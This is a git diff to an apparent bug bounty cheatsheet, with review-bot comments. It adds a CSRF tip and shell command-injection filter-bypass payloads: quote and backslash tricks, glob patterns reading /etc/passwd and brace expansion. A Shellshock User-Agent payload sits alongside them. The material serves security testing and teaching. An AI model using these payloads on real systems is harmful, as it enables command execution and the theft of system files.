diff --git a/cheatsheets/bugbountytips.md b/cheatsheets/bugbountytips.md index ae268db..d678d96 100644 --- a/cheatsheets/bugbountytips.md +++ b/cheatsheets/bugbountytips.md @@ -29,3 +29,10 @@ Look for *hackathon-related* assets. What I mean by this is sometimes companies **Tip #6** Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/ + + + +**Tip #7** + +When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. +For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim. diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md index 66d39cf..7ddfc73 100644 --- a/cheatsheets/rce.md +++ b/cheatsheets/rce.md @@ -10,6 +10,27 @@ strŅ–ng If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. +**Basic Bypasses** + +``` +i'''d +i"""d +``` + +``` +\l\s -l\a\h +``` + +``` +cat /e?c/p?ss?? +cat /e??/??ss* +``` + +``` +{ls,} +{ls,-a} +``` + **Shellshock Bug** ```bash @@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru ```zsh curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ -``` \ No newline at end of file +```
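Review bot: In the bugbountytips.md hunk, Tip #7 states the method change "improves the CVSS score" without saying when it applies; it only matters if the application actually accepts the same state-changing request via GET, so the tip should say "check whether the endpoint also accepts GET" before claiming an impact increase. Two documentation points in the same hunk: the three added blank lines before `**Tip #7**` are more than the file uses between other tips, and `\[img\]` escapes the brackets in a way the rest of the file does not, so `<img>` or plain backticks would render more consistently. It would also help to note the corresponding fix for the behaviour being described, namely rejecting state-changing requests on GET and validating the anti-CSRF token regardless of method, since the cheatsheet is read by defenders as well.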
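Review bot: In the rce.md hunk, the four new fenced blocks under `**Basic Bypasses**` are untagged while the existing blocks in the same file use ```` ```bash ```` and ```` ```zsh ````, so tag them `bash` for consistent rendering. The section is also missing the one-line explanation each block needs to be useful as a cheatsheet entry: the first block relies on adjacent empty quotes being concatenated by the shell, the second on backslash escapes being dropped, the third on `?` and `*` glob expansion, and the fourth on brace expansion, which is bash/zsh behaviour and will not expand under POSIX `sh`. Stating which kind of keyword filter each one defeats would also make the defensive point explicit: these entries show that blacklisting command names is not a fix, and the section should say that the remediation is to avoid passing user input to a shell at all.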